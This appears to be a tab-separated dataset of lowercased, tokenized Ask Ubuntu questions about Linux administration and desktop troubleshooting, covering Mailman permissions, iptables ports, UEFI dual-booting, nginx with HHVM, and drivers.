400591	network drives shortcuts on desktop , howto do it correctly ?	how can i do to make available a network drive on the desktop as i do with windows ? i mean to put just a link on the desk that gives me the access to the network folder , i 'd like it capable to keep the credentials so that the user does n't have to write them down each time the start the pc . i tried something like this : 1 ) i created a folder on this position /mnt/disk02 and set persmissions to chmod 777 2 ) on fstab i wrote the following : smb : // '' netresource '' /share /mnt/disk02 ext4 defaults 3 ) i 've made a shortcut for disk02 on the desktop . obviously on restart ubuntu failed to mount the share because i did n't know where to put the credentials . what is the corret way to do this ? thank you ! ! !
400592	/var/lib/mailman/cgi-bin bad group ( has : root , expected list ) ( fixing )	i 'm just trying to install mailman so that the permissions are correct , but no matter what i do mailman installs with the wrong permissions : thufir @ dur : ~ $ thufir @ dur : ~ $ sudo apt-get install mailman reading package lists ... done building dependency tree reading state information ... done suggested packages : spamassassin lynx listadmin the following new packages will be installed : mailman 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . need to get 0 b/10.2 mb of archives . after this operation , 35.0 mb of additional disk space will be used . preconfiguring packages ... ( reading database ... 233409 files and directories currently installed . ) unpacking mailman ( from ... /mailman_1 % 3a2.1.16~rc2-1_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up libaprutil1-dbd-sqlite3 ( 1.5.2-1 ) ... setting up libaprutil1-ldap ( 1.5.2-1 ) ... setting up apache2-bin ( 2.4.6-2ubuntu2.1 ) ... setting up apache2-data ( 2.4.6-2ubuntu2.1 ) ... setting up apache2 ( 2.4.6-2ubuntu2.1 ) ... * restarting web server apache2 [ ok ] setting up mailman ( 1:2.1.16~rc2-1 ) ... looking for enabled languages ( this may take some time ) ... done . installing site language en ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. done . configuring mailman for domain dur.bounceme.net ... upgrading from version 0x0 to 0x20110c2 getting rid of old source files update-rc.d : warning : default stop runlevel arguments ( 0 1 6 ) do not match mailman default-stop values ( none ) * site list for mailman missing ( looking for list named 'mailman ' ) . * please create it ; until then , mailman will refuse to start . processing triggers for ureadahead ... thufir @ dur : ~ $ thufir @ dur : ~ $ sudo newlist mailman enter the email of the person running the list : thufir @ dur.bounceme.net initial mailman password : to finish creating your mailing list , you must edit your /etc/aliases ( or equivalent ) file by adding the following lines , and possibly running the `newaliases ' program : # # mailman mailing list mailman : `` |/var/lib/mailman/mail/mailman post mailman '' mailman-admin : `` |/var/lib/mailman/mail/mailman admin mailman '' mailman-bounces : `` |/var/lib/mailman/mail/mailman bounces mailman '' mailman-confirm : `` |/var/lib/mailman/mail/mailman confirm mailman '' mailman-join : `` |/var/lib/mailman/mail/mailman join mailman '' mailman-leave : `` |/var/lib/mailman/mail/mailman leave mailman '' mailman-owner : `` |/var/lib/mailman/mail/mailman owner mailman '' mailman-request : `` |/var/lib/mailman/mail/mailman request mailman '' mailman-subscribe : `` |/var/lib/mailman/mail/mailman subscribe mailman '' mailman-unsubscribe : `` |/var/lib/mailman/mail/mailman unsubscribe mailman '' hit enter to notify mailman owner ... thufir @ dur : ~ $ thufir @ dur : ~ $ ll /var/lib/mailman/ total 36 drwxrwsr-x 8 root list 4096 jan 5 09:00 ./ drwxr-xr-x 71 root root 4096 jan 5 09:00 ../ drwxrwsr-x 4 root list 4096 jan 5 09:00 archives/ lrwxrwxrwx 1 root root 20 aug 21 02:16 bin - > /usr/lib/mailman/bin/ lrwxrwxrwx 1 root root 24 aug 21 02:16 cgi-bin - > /usr/lib/cgi-bin/mailman/ lrwxrwxrwx 1 root root 21 aug 21 02:16 cron - > /usr/lib/mailman/cron/ drwxrwsr-x 2 root list 4096 jan 5 09:00 data/ lrwxrwxrwx 1 root root 25 aug 21 02:16 icons - > /usr/share/images/mailman/ drwxrwsr-x 3 root list 4096 jan 5 09:01 lists/ lrwxrwxrwx 1 root root 17 aug 21 02:16 locks - > /var/lock/mailman/ lrwxrwxrwx 1 root root 16 aug 21 02:16 logs - > /var/log/mailman/ lrwxrwxrwx 1 root root 21 aug 21 02:16 mail - > /usr/lib/mailman/mail/ lrwxrwxrwx 1 root root 24 aug 21 02:16 mailman - > /usr/lib/mailman/mailman/ drwxr-xr-x 40 root list 4096 jan 5 09:00 messages/ drwxrwsr-x 3 list list 4096 jan 5 09:01 qfiles/ lrwxrwxrwx 1 root root 24 aug 21 02:16 scripts - > /usr/lib/mailman/scripts/ drwxrwsr-x 2 root list 4096 aug 21 02:15 spam/ lrwxrwxrwx 1 root root 12 aug 21 02:16 templates - > /etc/mailman/ -rw-r -- r -- 1 root list 15 aug 21 02:16 .version thufir @ dur : ~ $ thufir @ dur : ~ $ thufir @ dur : ~ $ sudo /usr/lib/mailman/bin/check_perms -f directory must be at least 02775 : /var/lib/mailman/logs ( fixing ) /var/lib/mailman/cron bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/logs bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/icons bad group ( has : root , expected list ) ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages ( fixing ) /var/lib/mailman/mail bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/locks bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/mailman bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/cgi-bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/templates bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/scripts bad group ( has : root , expected list ) ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sk ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/uk ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/nl ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ru ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/it ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ro ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/vi ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ca ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/et ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/tr ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/el ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ia ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/da ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ja ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pt ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/eu ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/hu ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fi ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sv ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/gl ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/hr ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ar ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/no ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fa ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fr ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/zh_tw ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ko ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/cs ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/de ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sr ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sl ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pl ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/es ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/lt ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pt_br ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/he ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/zh_cn ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ast ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sk/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/uk/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/nl/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ru/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/it/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ro/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/vi/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ca/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/et/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/tr/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/el/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ia/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/da/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ja/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pt/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/eu/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/hu/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fi/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sv/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/gl/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/hr/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ar/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/no/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fa/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/fr/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/zh_tw/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ko/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/cs/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/de/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sr/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/sl/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pl/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/es/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/lt/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/pt_br/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/he/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/zh_cn/lc_messages ( fixing ) directory permissions must be 02775 : /var/lib/mailman/messages/ast/lc_messages ( fixing ) /var/lib/mailman/archives/private bad group ( has : www-data , expected list ) ( fixing ) /var/lib/mailman/archives/private/mailman.mbox bad group ( has : www-data , expected list ) ( fixing ) /var/lib/mailman/archives/private/mailman bad group ( has : www-data , expected list ) ( fixing ) /var/lib/mailman/archives/private/mailman/index.html bad group ( has : www-data , expected list ) ( fixing ) problems found : 92 re-run as list ( or root ) with -f flag to fix thufir @ dur : ~ $ thufir @ dur : ~ $ sudo /usr/lib/mailman/bin/check_perms -f /var/lib/mailman/cron bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/logs bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/icons bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/mail bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/locks bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/mailman bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/cgi-bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/templates bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/scripts bad group ( has : root , expected list ) ( fixing ) problems found : 10 re-run as list ( or root ) with -f flag to fix thufir @ dur : ~ $ thufir @ dur : ~ $ sudo /usr/lib/mailman/bin/check_perms -f /var/lib/mailman/cron bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/logs bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/icons bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/mail bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/locks bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/mailman bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/cgi-bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/templates bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/bin bad group ( has : root , expected list ) ( fixing ) /var/lib/mailman/scripts bad group ( has : root , expected list ) ( fixing ) problems found : 10 re-run as list ( or root ) with -f flag to fix thufir @ dur : ~ $ thufir @ dur : ~ $ is this a bug with the mailman , or am i doing it `` wrong '' somehow , or is something `` wrong '' with my system ? for a default install , it seems a red flag that it 's necessary to check the install permissions , and even worse that the mailman utility ca n't fix it . i need to manually change the permissions to whatever these files link to ? that just seems excessive . i would naively lean towards it being a packaging issue , but maybe i borked it somehow , first , so that now it wo n't install correctly . see also : http : //webmasters.stackexchange.com/questions/30557/howto-fix-errno-13-permission-denied-in-mailman-mailing-lists http : //www.gnu.org/software/mailman/mailman-install/troubleshooting.html https : //bbs.archlinux.org/viewtopic.php ? pid=1292722
400594	why `` remove ubuntu 12.04 and replace it with ubuntu 13.10 '' means to use all of the disk and lose all data ?	i recently decided to move to ubuntu 13.10 ( by move i mean install from iso not update ) my ubuntu 12.04 had 3 partitions swap partition linux partition ( ext4 ) ntfs partition of 500gb of data why selecting the option `` remove ubuntu 12 and replace it with ubuntu 13 '' decided to mess with my partition scheme ? why did it decided to remove the ntfs and make me lose years and years of data by using all disk and not reuse the swap and ext4 partition of the version 12.04 ? also a bug has been open https : //bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/1265192 added : i first tried testdisk but the one that helped me was photorec i recovered as many files as posible from the lost partition very important as soon as a picture or file is accidentally deleted , or you discover any missing , do not save any more pictures or files to that memory device or hard disk drive ; otherwise you may overwrite your lost data . this means that while using photorec , you must not choose to write the recovered files to the same partition they were stored on . this also applies for any other tool not just for the two that i have mentioned for further info about this tools take a look at this how to resolve `` the harddisk seems too small '' with testdisk deeper search
400596	ports open plesk + ubuntu vserver	ich hoffe die community kann mir hier helfen nach endlosen google habe ich keine lösung gefunden . i hopy any can help me . vserver : strato ubuntu 12.04 + plesk 11.0 vorhaben : java datei .jar die eine communikation von aussen mit einer sql datenbank ermöglicht . diese benötigt einen port . what i will do : java data .jar running on vserver ( this data need a free port ) problem : die portfreigabe ... to open a port ... . caused by : java.io.ioexception : protocol mismatch for port 5089 : engine 's protocol is http , the url protocol is https getestete lösungen : try´s to open the port : plesk : port freigabe 5089 eingehen und ausgehen für tcp / udp [ url=http : //www.fotos-hochladen.net ] [ img ] http : //img5.fotos-hochladen.net/uploads/unbenannt1zigfsqwu0x.jpg [ /img ] [ /url ] console : iptables -a input -p udp -- dport 5089 -j accept iptables -a input -p tcp -- dport 5089 -j accept ( auch mit output ) teste mit : [ url ] http : //www.yougetsignal.com/tools/open-ports/ [ /url ] =5089 closed iptables -l [ quote ] chain input ( policy drop ) target prot opt source destination accept all -- anywhere anywhere state related , established reject tcp -- anywhere anywhere tcpflags : ! fin , syn , rst , ack/syn state new reject-with tcp-reset drop all -- anywhere anywhere state invalid accept all -- anywhere anywhere accept tcp -- anywhere anywhere tcp dpt:5089 accept udp -- anywhere anywhere udp dpt:5089 accept tcp -- anywhere anywhere tcp dpt : https accept tcp -- anywhere anywhere tcp dpt:8443 accept tcp -- anywhere anywhere tcp dpt:8880 accept tcp -- anywhere anywhere tcp dpt : http accept tcp -- anywhere anywhere tcp dpt : https accept tcp -- anywhere anywhere tcp dpt : ftp accept tcp -- anywhere anywhere tcp dpt : ssh accept tcp -- anywhere anywhere tcp dpt : smtp accept tcp -- anywhere anywhere tcp dpt : ssmtp accept tcp -- anywhere anywhere tcp dpt : pop3 accept tcp -- anywhere anywhere tcp dpt : pop3s accept tcp -- anywhere anywhere tcp dpt : imap2 accept tcp -- anywhere anywhere tcp dpt : imaps accept tcp -- anywhere anywhere tcp dpt : poppassd drop tcp -- anywhere anywhere tcp dpt : mysql accept tcp -- anywhere anywhere tcp dpt : postgresql accept tcp -- anywhere anywhere tcp dpt:9008 accept tcp -- anywhere anywhere tcp dpt:9080 accept udp -- anywhere anywhere udp dpt : netbios-ns accept udp -- anywhere anywhere udp dpt : netbios-dgm accept tcp -- anywhere anywhere tcp dpt : netbios-ssn accept tcp -- anywhere anywhere tcp dpt : microsoft-ds accept udp -- anywhere anywhere udp dpt : openvpn drop udp -- anywhere anywhere udp dpt : domain drop tcp -- anywhere anywhere tcp dpt : domain accept icmp -- anywhere anywhere icmptype 8 code 0 accept all -- anywhere anywhere accept udp -- anywhere anywhere udp dpt : https chain forward ( policy drop ) target prot opt source destination accept all -- anywhere anywhere state related , established reject tcp -- anywhere anywhere tcpflags : ! fin , syn , rst , ack/syn state new reject-with tcp-reset drop all -- anywhere anywhere state invalid accept all -- anywhere anywhere drop all -- anywhere anywhere chain output ( policy drop ) target prot opt source destination accept all -- anywhere anywhere state related , established reject tcp -- anywhere anywhere tcpflags : ! fin , syn , rst , ack/syn state new reject-with tcp-reset drop all -- anywhere anywhere state invalid accept all -- anywhere anywhere accept tcp -- anywhere anywhere tcp dpt:5089 accept udp -- anywhere anywhere udp dpt:5089 accept tcp -- anywhere anywhere tcp dpt : https accept all -- anywhere anywhere [ /quote ] natürlich habe ich auch in der einstellungen der jar versucht den port bereits auf einen offenen ssl port 443 zu legen allerdings selbe fehler meldung . i have too try the port in the data setting on jar chance to 443 ( its already open ) but does not work . the support of server say the ports or not free ( 443 its open ) der support sag die port sind nicht frei ... . help me please
400597	is it a good idea to install all things in winetricks ?	as known , to run windows programs on wine we usually need to install additional components and stuff to make wine run it . i 'm just thinking , why the pain ? winetricks has a list of `` libraries '' ( or whatever ) , each time i want to run something i need to install some , why not install them all ? or maybe is there a set of instructions or some documentation or so that would tell me to install certain things in winetricks that would make wine run `` almost anything '' like windows does ? is there a way to `` get the best out of wine '' ?
400600	fm2+ motherboard and kaveri apu compatibility . gigabyte itx mobo	hello i am considering building a ubuntu/steam os box . i am considering using a gigabyte fm2+ itx a88x board with built in wifi with an upcoming amd kaveri chip . would i have any trouble ubuntu-drivers wise with that board , especially the wifi card ? if so , should i hold off on installation ?
400602	uefi dual-boot - ubuntu 12.04.3 + windows 8.1 ( one gpt hdd )	uefi dual-boot - ubuntu 12.04.3 + windows 8.1 ( one gpt hdd ) hello , i 'm having trouble setting up a dual-boot ( ubuntu 12.04 lts and windows 8.1 ) in my asus k55vm laptop 's hard drive disk ( 500 gb ) . i was mostly following tutorials for doing this , but at some point something has gone wrong . up to now , i have followed these steps : i formatted my hdd into gpt . i clean-installed windows 8.1 . i did n't prevent windows from choosing the partitions to use and it created these partitions : a recovery partition ( sda1 ) . an efi system partition ( sda2 ) . a microsoft reserved partition ( sda3 ) . a windows data partition or c drive ( sda4 ) . i reduced the windows data partition via windows ' disk management . i made a bootable usb stick with ubuntu 12.04 lts from iso , using universal usb installer . i created these partitions for ubuntu : a boot partition , mounted at /boot ( sda5 ) . a root partition , mounted at / ( sda6 ) . a swap partition ( sda7 ) . in device for boot loader installation i chose : /dev/sda . then , when i rebooted , it went straight into ubuntu . so i installed boot-repair , and clicked on recommended repair . it automatically did its job without asking for anything . i rebooted and grub showed up , with a lot of options . at this point i had a decent dual-boot setup ; ubuntu and both windows entries worked fine : ubuntu . windows boot uefi loader . windows uefi bkpbootmgfw.efi . i executed this command : sudo grub-install -- force /dev/sda5 . then i tried to make windows 8.1 's boot manager the main boot manager , so that i could choose which os to boot into from a menu . i downloaded easybcd on windows . it showed 2 ubuntu entries and 1 windows entry . i went into bcd deployment tab and clicked on write mbr . at this point , i went into bios and made windows boot manager the first boot option . when i rebooted , i got a black screen with the message efidisk read error , and then ( i guess ) it switched to the next boot option , which is ubuntu , resulting in grub showing up . from grub , ubuntu entry is working and so are both windows entries . if i choose ubuntu , it normally boots into ubuntu . but if i choose windows , it goes into windows ' boot manager . in windows ' boot manager , a menu shows up : ubuntu . ubuntu . windows 8.1 . if i choose windows , it boots into windows without any problem . if i choose ubuntu , it boots into grub ( back to step 14 ) . here 's my bootinfo summary : http : //paste.ubuntu.com/6698171/ windows boot manager is clearly not working as expected ; i ca n't directly boot into it and i ca n't boot into it from bios either ( efidisk read error again ) . if i want to boot into windows i need to boot into grub first , which is the opposite of what i wanted . i need help at this point . what is the best thing i can do ? is there a more reliable and/or simpler way of acomplishing a satisfying dual-boot for this situation ? can someone provide a way for going back to step 8 , where i had a more efficient dual-boot setup ? if only i could undo what i did with easy bcd and skip windows ' boot menu ... can someone provide a way to fix this mess ? thanks in advance and sorry for the length of this , i wanted to be exhaustive .
400604	user account & installed apps not found after ubuntu restart	i have installed ubuntu 12.04 on my desktop pc . i also have a windows installed in that system . so , after ubuntu installataion i had login automatically without asking a username and password . i have installed some apps from software center . but after restarting ubuntu i found my installed apps missing . while googling this issue , i understood i have login as a guest and ubuntu removes guest login files on system shutdown . then i created a new user from system settings - > user accounts . then i logged out and login again as new user . but after restarting the machine i cant found the newly created user account there . what is the problem here ? is there any option in ubuntu to remember user accounts ?
400605	enlightemnent , window content upside down	i 've installed enlightenment with this commands : sudo add-apt-repository ppa : vase/ppa sudo apt-get update sudo apt-get install enlightenment ( ubuntu 13.10 ( unity as default ) , amd64 with enlightenment 0.18.0-alpha4 ) but as i open my session with it , every window content is upside down : ( and reversed & flipped with gimp ) : and to click on buttons , i have to click where they are normally : i did the installation on a bootable usb key too ( with ubuntu installed on it ) but i have the same result . thanks !
400608	cant make windows 7 visible in grub	after installing ubuntu 13.10 over ubuntu 12.10 ( fresh install formating ext4 partition of previous ubuntu ) it doesnt recognize the windows 7 in the other partition . i installed grub customizer with no results , also lauched the command update-grub with no results . finally installed boot-repair and it shows windows 7 in the summary info but not in the grub options after restarting . what can i try next ? boot repair summary link : http : //paste.ubuntu.com/6698248/
400609	i need help with increasing the size of the file-system partition . partitioning-o-phobia !	when i firstly installed ubuntu i gave it 20gb of space for the filesystem . ... time passed and i get a message `` the system has only 300mb available '' so i need to enlarge the filesystem . here 's my partition table : i 'm a total noob to partitioning and i have a horrible experience with it ; once i had this problem : fix partition or rescue data from it . i used ddrescue on my notebook . thanks to the great support i got , i gained the tumbleweed badge and i could n't fix it and i had to re-install windows . the notebook did n't have much important data but this computer 's much more important to me . i have backed up the data on the `` database '' partition . anyways i need step-by-step instructions how to take space from the `` database '' partition to enlarge my `` filesystem '' partition . and what about that red exclamation mark at /dev/sda6 ? how do i deal with it ? ... what is it ? ? the red exclamation is not gone ! tell me any extra information you need to know . thanks in advance ! : d
400612	juju bootstrap fails on local environment - could not install mongo service	i 'm attempting to use juju install for the first time . i created a 12.04 guest vm just for this process and i 'm getting an error when i try an complete the bootstrap process sudo juju bootstrap error could not install mongo service : exec [ `` start '' `` -- system '' `` juju-db-david-local '' ] : exit status 1 ( start : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory ) error exec [ `` start '' `` -- system '' `` juju-db-david-local '' ] : exit status 1 ( start : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory ) i 'm following the instructions from here : https : //juju.ubuntu.com/docs/getting-started.html https : //juju.ubuntu.com/docs/config-lxc.html one google search mentioned an issue relating to disk space . i have plenty . other ideas ?
400616	how can i highlight c syntax in cuda ( .cu ) files in nano ?	i 've already highlighted c syntax for .c files in nano by adding include `` usr/share/nano/c.nanorc '' to ~/.nanorc . unfortunately , this only works for .c files , not for .cu ( cuda ) files . how can i enable c syntax highlighting for files ending .cu ?
400619	nginx with hhvm - not found	i'v set up nginx with hhvm but , any file .php returns me `` not found '' except index.php that returns me running on hhvm version 2.3.2 . some of my configurations /etc/nginx/sites-enable/default location ~ \.php $ { root /usr/share/nginx/www ; fastcgi_pass 127.0.0.1:9000 ; fastcgi_index index.php ; fastcgi_param script_filename /usr/share/nginx/www $ fastcgi_script_name ; include fastcgi_params ; } /etc/hhvm/server.hdf server { port = 80 sourceroot = /usr/share/nginx/www/ defaultdocument = index.php }
400620	wireless does not appear after instal of ubuntu on laptop ?	i need help the wireless does not work on my dell studio 1535 laptop . i have a broadcom corporation bcm4322 . thanks
400621	keyboard shortcut to lock screen & turn off monitor	i can turn off the monitor and lock the screen manually with cinnamon-screensaver-command -l & & xset dpms force off . however , if i try to put that command as a custom shortcut in keyboard- > shortcuts , the monitor does n't turn off , and if i switch the order then nothing happens . how can i get a shortcut to fire both commands ?
400626	numerous hard restarts cause gradual damage to system ?	i 'm setting my mining rig on ubuntu x13.10 amd64 up to lose power about 5 times a day those of us all can remember a time long ago when you 'd get your hand slapped if you shut down a computer by the power switch , nowadays such quirks have been worked out and complete filesystem corruption from power loss is mostly gone . this led me to think about how true this remains ... ... . 1 -- i 'll have an outlet like belkin wemo ( simple approach ) or an arduino controlled relay ( if i get motivated ) cycle power on the rig a few times a day , 2 -- the bios is set to power right back on at power loss , 3 -- my mining program cgminer starts automatically when ubuntu boots . killing the system from 1400w w/ 7 graphics cards running at 100 % however many times a day , will the power cycling gradually degrade performance of any component ? ( i know , there exists a code-driven solution , a simple one too . but i leave town often , and hard hangs happen more often than not- which require an ac hard reset to get going again . i dont want to be stuck out of town for a week not mining because of this . ) more info on my setup if its pertinent : -- ubuntu 13.10 amd 64 -- asus m5a97 le r2.0 mobo -- 5ea xfx radeon 7850 cards -- 2ea gigabyte r9 280x cards -- 1300w rosewill lightning psu -- [ edit ] also , os installed to usb thumb drive
400629	how can i access to guest machine via ssh which has bridged adapter	i 'm sorry for the mistakes i 've made , i 'm not englishman . i have ubuntu 13.10 and virtualbox installed ubuntu server 13.10 ( bridged adapter ) . guest machine has nginx , mariadb , php etc . - hence web server . so at the host machine i successfully connect to vm server through browser and everything works ok. now i want to set up ssh connection between guest and host . how can i implement it ? i think something tie with port forwarding and network type on guest , but i do n't have enough knowledge to understand what i do wrong . googling direct me to host-only network type on guest machine and configuring its ip to static instead of dhcp . please , help )
400630	chrome tab notifications do not work	as you probably now in windows when using chrome and you get email in gmail or you get facebook notification , then that tab has highlighted moving effect so you can see you get new notification . but since i installed ubuntu 13.10 this does not work , and i could n't find how to do it . solution would be appreciated .
400635	detailed document for dns-search in /etc/network/interfaces ?	i do n't find a detailed document of 'dns-search ' in /etc/network/interfaces . does anybody know where to find the detailed document ? thanks .
400640	mouse suddenly broken in kde 12.04 , gnome 12.04 and ubuntu 12.04 , works in xfce	i recently did apt-get upgrade and hibernated my computer some hours later . when i started it again , the mouse was broken . just as if it was unplugged ( but it was not ) . i rebooted the computer and the mouse started to work again , kind of : in kubuntu 12.04 : i can left click only the kubuntu menu bar , but not windows and applications . it 's as if the left clicks do n't happen at all , when i click windows and applications . or some times i can click windows and applications , but not the kubuntu menu bar . in ubuntu 12.04 unity and gnome : i can click everything , but every 5 seconds a spurious left click happens . as if someone sits next to me and clicks the left mouse button every 5 seconds . however , the mouse works fine in ubuntu 's main login dialog , and in the xfce window manager . so apparently the mouse is okay ? ( i 'm using xfce right now . ) i feel totally at lost as to why the above-mentioned things happen ! what might be wrong ? what types of problems might cause issues like these ? what can i do to fix the mouse issues ? the computer is a desktop not a laptop . here 's the output from lsusb : 20:16:59 4 ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ... bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 002 : id 09da:0006 a4 tech co. , ltd optical mouse wop-35 / trust 450l optical mouse bus 004 device 002 : id 05f3:0081 pi engineering , inc. kinesis integrated hub bus 004 device 003 : id 05f3:0007 pi engineering , inc. kinesis advantage pro mpc/usb keyboard
400643	ubuntu 12.04.3 lts blank screen on start up after installation of amd ati graphics driver -	i have been using ubuntu 12.04.3 for about a month and half . i noticed that my laptop was always overheating which i found out was due to graphics drivers not being installed while searching on the internet . so i tried installing the graphics drivers through terminal following the guide on : https : //help.ubuntu.com/community/binarydriverhowto/ati . i did n't test it out immediately whether if it was working fine but instead it has n't caused this issue . please if there is anyone with some knowledge about this i would be greatful for some advise.. some info about the laptop : hp pavilion dv6 with an ati graphics card and its dual booted with a windows 7 .
